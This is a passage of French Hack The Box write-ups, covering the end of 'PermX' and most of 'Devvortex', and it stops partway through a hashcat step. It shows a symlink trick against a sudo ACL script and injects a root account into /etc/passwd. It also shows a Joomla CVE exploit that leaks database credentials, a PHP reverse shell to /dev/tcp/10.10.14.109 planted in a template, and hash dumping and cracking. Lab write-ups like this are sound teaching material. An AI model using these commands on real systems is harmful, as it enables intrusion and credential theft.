class="line"><span class="cl">/var/www/chamilo/app/config/configuration.php: <span class="s1">&#39;show_password_field&#39;</span> <span class="o">=</span>&gt; false, </span></span><span class="line"><span class="cl">/var/www/chamilo/app/config/configuration.php: <span class="s1">&#39;show_password_field&#39;</span> <span class="o">=</span>&gt; true, </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">/var/www/chamilo/app/config/configuration.php:<span class="nv">$_configuration</span><span class="o">[</span><span class="s1">&#39;db_password&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;03F6lY3uXAP2bkW8&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On peut désormais se connecter avec le mot de passe <strong>03F6lY3uXAP2bkW8</strong> pour l&rsquo;utilisateur <strong>mtz</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@permx:/home$ su mtz </span></span><span class="line"><span class="cl">Password: 03F6lY3uXAP2bkW8 </span></span><span class="line"><span class="cl">mtz@permx:/home$ cat us </span></span><span class="line"><span class="cl">cat: us: No such file or directory </span></span><span class="line"><span class="cl">mtz@permx:/home$ ls </span></span><span class="line"><span class="cl">mtz </span></span><span class="line"><span class="cl">mtz@permx:/home$ <span class="nb">cd</span> mtz/ </span></span><span class="line"><span class="cl">mtz@permx:~$ cat user.txt </span></span><span class="line"><span class="cl">a45e.....7836 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="optaclsh-as-root">/opt/acl.sh as root </h3><p>On fait sudo -l, on observe que l&rsquo;on peut executer le script suivant en tant que root : <strong>/opt/acl.sh</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[</span> <span class="s2">&#34;</span><span class="nv">$#</span><span class="s2">&#34;</span> -ne <span class="m">3</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Usage: </span><span class="nv">$0</span><span class="s2"> user perm file&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">user</span><span class="o">=</span><span class="s2">&#34;</span><span class="nv">$1</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">perm</span><span class="o">=</span><span class="s2">&#34;</span><span class="nv">$2</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">target</span><span class="o">=</span><span class="s2">&#34;</span><span class="nv">$3</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[[</span> <span class="s2">&#34;</span><span class="nv">$target</span><span class="s2">&#34;</span> !<span class="o">=</span> /home/mtz/* <span class="o">||</span> <span class="s2">&#34;</span><span class="nv">$target</span><span class="s2">&#34;</span> <span class="o">==</span> *..* <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Access denied.&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Check if the path is a file</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[</span> ! -f <span class="s2">&#34;</span><span class="nv">$target</span><span class="s2">&#34;</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Target must be a file.&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/usr/bin/sudo /usr/bin/setfacl -m u:<span class="s2">&#34;</span><span class="nv">$user</span><span class="s2">&#34;</span>:<span class="s2">&#34;</span><span class="nv">$perm</span><span class="s2">&#34;</span> <span class="s2">&#34;</span><span class="nv">$target</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Il permet de modifier les droits de n&rsquo;importe quel fichier. Cependant, il faut que ce fichier soit dans /home/mtz et qu&rsquo;il soit un fichier, pas un lien symbolique.</p> <p>La technique consiste donc à créer deux liens symboliques qui vont vers le fichier qui nous intéresse. Ensuite on change les droits</p> <p>J&rsquo;ai donc modifier les droits de /etc/passwd pour pouvoir le modifier en tant que <strong>mtz</strong>. On ajoute un utilisateur hacker, avec le mdp &ldquo;password&rdquo; qui a les droits root On se connecte à hacker et on affiche le fichier root.txt avec le flag.</p> <p>!!ATTENTION!!, il y a une contab qui retablit les fichiers /etc/passwd et qui supprime les liens symboliques dans /home/mtz donc il faut le faire rapidement&hellip;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ln -s /etc/passwd .a <span class="o">&amp;&amp;</span> ln -s .a .b <span class="o">&amp;&amp;</span> sudo /opt/acl.sh mtz rwx /home/mtz/.b <span class="o">&amp;&amp;</span> cat /etc/passwd </span></span><span class="line"><span class="cl"><span class="c1">## Affichage de /etc/passwd</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Ajout d&#39;un utilisateur hacker avec les droits root et le mot de passe &#34;password&#34;</span> </span></span><span class="line"><span class="cl">$ vi /etc/passwd </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hacker:<span class="nv">$6$XbyWNHgUybMiBnVK$FOoR2G</span>.C.YAk0TAzOcf2igmcoVWkJtzDQgs7C4TmE7fazCwasTsutVY.5AR8CkiA7cBcGGx8cHdPtUUdkXOGA1:0:0::/root:/bin/bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ su hacker </span></span><span class="line"><span class="cl">Password: password </span></span><span class="line"><span class="cl">$ cat /root/root.txt </span></span><span class="line"><span class="cl">1808.....4142 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/devvortex-htb/Sat, 23 Mar 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/devvortex-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Devvortex cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Devvortex</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.242</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -p- 10.10.11.242 </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://devvortex.htb/ </span></span></code></pre></td></tr></table> </div> </div><h3 id="subdomain-enumeration--gobuster">Subdomain enumeration : gobuster </h3><p>Il faut utiliser gobuster pour faire une enumeration des subdomains !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">─$ gobuster dns -d devvortex.htb -t <span class="m">50</span> -w /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Domain: devvortex.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: 1s </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in DNS enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Found: dev.devvortex.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Progress: <span class="m">4614</span> / <span class="m">4615</span> <span class="o">(</span>99.98%<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="nv">Finished</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="gosbuster-devdevortexhtb">gosbuster dev.devortex.htb </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">└─$ gobuster dir -u dev.devvortex.htb -t <span class="m">50</span> -w /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://dev.devvortex.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">/administrator <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/administrator/<span class="o">]</span> </span></span><span class="line"><span class="cl">/api <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/api/<span class="o">]</span> </span></span><span class="line"><span class="cl">/cache <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/cache/<span class="o">]</span> </span></span><span class="line"><span class="cl">/components <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/components/<span class="o">]</span> </span></span><span class="line"><span class="cl">/home <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 23221<span class="o">]</span> </span></span><span class="line"><span class="cl">/images <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/images/<span class="o">]</span> </span></span><span class="line"><span class="cl">/includes <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/includes/<span class="o">]</span> </span></span><span class="line"><span class="cl">/index.php <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 23221<span class="o">]</span> </span></span><span class="line"><span class="cl">/language <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/language/<span class="o">]</span> </span></span><span class="line"><span class="cl">/layouts <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/layouts/<span class="o">]</span> </span></span><span class="line"><span class="cl">/libraries <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/libraries/<span class="o">]</span> </span></span><span class="line"><span class="cl">/media <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/media/<span class="o">]</span> </span></span><span class="line"><span class="cl">/modules <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/modules/<span class="o">]</span> </span></span><span class="line"><span class="cl">/plugins <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/plugins/<span class="o">]</span> </span></span><span class="line"><span class="cl">/robots.txt <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 764<span class="o">]</span> </span></span><span class="line"><span class="cl">/templates <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/templates/<span class="o">]</span> </span></span><span class="line"><span class="cl">/tmp <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://dev.devvortex.htb/tmp/<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="administrator-page">Administrator page </h3><p>Il y a une page /administrator avec un login/pass. On peut voir le nom de l&rsquo;outil qui permet cette page de connexion, <strong>Joomla!</strong>.</p> <p>On peut trouver la version de Joomla! ici : <a class="link" href="http://dev.devvortex.htb/administrator/manifests/files/joomla.xml" target="_blank" rel="noopener" >http://dev.devvortex.htb/administrator/manifests/files/joomla.xml</a> Version: <strong>4.2.6</strong></p> <p>En cherchant sur internet, on trouve rapidement une CVE sur cette version de Joomla ainsi qu&rsquo;un repo github qui permet de l&rsquo;exploiter</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">└─$ ruby exploit.rb http://dev.devvortex.htb:80 </span></span><span class="line"><span class="cl">Users </span></span><span class="line"><span class="cl"><span class="o">[</span>649<span class="o">]</span> lewis <span class="o">(</span>lewis<span class="o">)</span> - lewis@devvortex.htb - Super Users </span></span><span class="line"><span class="cl"><span class="o">[</span>650<span class="o">]</span> logan paul <span class="o">(</span>logan<span class="o">)</span> - logan@devvortex.htb - Registered </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Site info </span></span><span class="line"><span class="cl">Site name: Development </span></span><span class="line"><span class="cl">Editor: tinymce </span></span><span class="line"><span class="cl">Captcha: <span class="m">0</span> </span></span><span class="line"><span class="cl">Access: <span class="m">1</span> </span></span><span class="line"><span class="cl">Debug status: <span class="nb">false</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database info </span></span><span class="line"><span class="cl">DB type: mysqli </span></span><span class="line"><span class="cl">DB host: localhost </span></span><span class="line"><span class="cl">DB user: lewis </span></span><span class="line"><span class="cl">DB password: P4ntherg0t1n5r3c0n## </span></span><span class="line"><span class="cl">DB name: joomla </span></span><span class="line"><span class="cl">DB prefix: sd4fg_ </span></span><span class="line"><span class="cl">DB encryption <span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve donc les credentials suivant: user: <strong>lewis</strong> mot de passe: <strong>P4ntherg0t1n5r3c0n##</strong></p> <p>En essayant de se connecter sur la page de login ça fonctionne! on arrive ensuite sur un Dashboard.</p> <h3 id="dashboard">Dashboard </h3><p>Il se trouve que ce dashboard utilise une <strong>template</strong>. La page de login également. Ce sont des modèles tout prêt, du code php déjà écrit qu&rsquo;il faut juste importer. Il se trouve que depuis le dashboard, on peut modifier les templates qui sont utilisées pour le dashboard et pour la page de login. Notament le code php. On va donc pouvoir modifier le code php du dashboard par exemple pour exectuer une commande bash et créer un reverse shell pour obtenir un acces sur la machine.</p> <h3 id="reverse-shell">Reverse shell </h3><p>On modifie le code php de la page d&rsquo;administration pour créer un reverse shell <img src="https://leopoldabgn.github.io/writeups/p/devvortex-htb/image.png" width="1233" height="604" srcset="https://leopoldabgn.github.io/writeups/p/devvortex-htb/image_hu_773e2ace9979525e.png 480w, https://leopoldabgn.github.io/writeups/p/devvortex-htb/image_hu_e095eab1eba80c8f.png 1024w" loading="lazy" alt="reverse shell" class="gallery-image" data-flex-grow="204" data-flex-basis="489px" > <img src="https://leopoldabgn.github.io/writeups/p/devvortex-htb/image-1.png" width="646" height="217" srcset="https://leopoldabgn.github.io/writeups/p/devvortex-htb/image-1_hu_9d4626ee83d9a2c4.png 480w, https://leopoldabgn.github.io/writeups/p/devvortex-htb/image-1_hu_c9e6717061fff4ed.png 1024w" loading="lazy" alt="reverse shell real command" class="gallery-image" data-flex-grow="297" data-flex-basis="714px" ></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">exec<span class="o">(</span><span class="s1">&#39;/bin/bash -c &#34;exec nohup bash -i &gt;&amp; /dev/tcp/10.10.14.109/44446 0&gt;&amp;1 &amp;&#34;&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">?&gt; </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">~ » nc -lvp <span class="m">44444</span> leopold@leopold-PC-FIXE </span></span><span class="line"><span class="cl">Listening on 0.0.0.0 <span class="m">44444</span> </span></span><span class="line"><span class="cl">Connection received on devvortex.htb <span class="m">53842</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>875<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">www-data@devvortex:~/dev.devvortex.htb/administrator$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">www-data </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable shell </h3><p>On ouvre un shell plus stable en python</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">^Z </span></span><span class="line"><span class="cl">stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="lewis---logan--user-flag">lewis -&gt; logan : user flag </h3><p>Avec le compte de lewis, on a pu accéder à la base de données du site web et récupérer les credentials de l&rsquo;utilisateur <strong>logan</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p </span></span><span class="line"><span class="cl">mysql&gt; show databases<span class="p">;</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Database <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> information_schema <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> joomla <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> performance_schema <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl">mysql&gt; use joomla </span></span><span class="line"><span class="cl">mysql&gt; show tables<span class="p">;</span> </span></span><span class="line"><span class="cl">+-------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Tables_in_joomla <span class="p">|</span> </span></span><span class="line"><span class="cl">+-------------------------------+ </span></span><span class="line"><span class="cl">................................. </span></span><span class="line"><span class="cl">................................. </span></span><span class="line"><span class="cl"><span class="p">|</span> sd4fg_usergroups <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> sd4fg_users <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> sd4fg_viewlevels <span class="p">|</span> </span></span><span class="line"><span class="cl">................................. </span></span><span class="line"><span class="cl"><span class="m">71</span> rows in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; <span class="k">select</span> * from sd4fg_users<span class="p">;</span> </span></span><span class="line"><span class="cl">..................................... </span></span><span class="line"><span class="cl">lewis@devvortex.htb <span class="p">|</span> <span class="nv">$2</span>y<span class="nv">$10$6</span>V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u </span></span><span class="line"><span class="cl">logan@devvortex.htb <span class="p">|</span> <span class="nv">$2</span>y<span class="nv">$10$IT4k5kmSGvHSO9d6M</span>/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 </span></span><span class="line"><span class="cl">..................................... </span></span><span class="line"><span class="cl"><span class="m">2</span> rows in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat---logan-password-getting-ssh-access">hashcat - logan password (getting ssh access) </h3><p>On crack le hash avec rockyou, et on obtient les credentials pour logan: user: <strong>logan</strong> password : <strong>tequieromucho</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat --help <span class="p">|</span> grep <span class="m">3200</span> </span></span><span class="line"><span class="cl"> <span class="m">3200</span> <span class="p">|</span> bcrypt <span class="nv">$2</span>*$, Blowfish <span class="o">(</span>Unix<span class="o">)</span> <span class="p">|</span> Operating System </span></span><span class="line"><span 